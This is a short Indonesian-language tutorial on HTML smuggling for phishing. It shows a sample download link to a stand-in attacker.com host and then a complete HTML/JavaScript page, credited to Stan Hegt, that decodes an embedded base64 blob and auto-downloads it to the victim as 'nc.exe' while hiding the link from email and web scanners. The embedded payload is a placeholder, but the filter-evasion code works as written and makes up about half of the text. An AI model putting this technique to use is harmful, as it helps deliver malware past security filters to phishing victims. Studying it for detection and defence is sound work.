03 - [Phishing] HTML Smuggling
HTML smuggling adalah teknik yang menggunakan JavaScript untuk menyembunyikan file dari filter konten.
Jika Anda mengirim email phishing dengan link unduhan, HTML-nya mungkin akan terlihat seperti ini:
1
<a href="http://attacker.com/file.doc">Download Me</a>
Email dan web scanner mampu mem-parsing-nya dan mengambil beberapa tindakan. Link tersebut dapat dihapus seluruhnya, atau konten URL diambil dan di-scan oleh AV sandbox.
HTML smuggling memungkinkan kita untuk menyembunyikannya dengan menyematkan payload ke dalam kode HTML dan menggunakan JavaScript untuk membuat browser mengunduh file yang ditentukan pada saat runtime.
Berikut adalah contoh kode sederhana yang dibuat oleh Stan Hegt:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'nc.exe';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>
Pada kode HTML di atas, scanner akan melihatnya sebagai HTML dan JavaScript biasa, tidak ada kode hyperlink.
Ketika korban mengakses file halaman HTML tersebut, secara otomatis dia akan mengunduh file yang telah ditentukan.
HTML Smuggling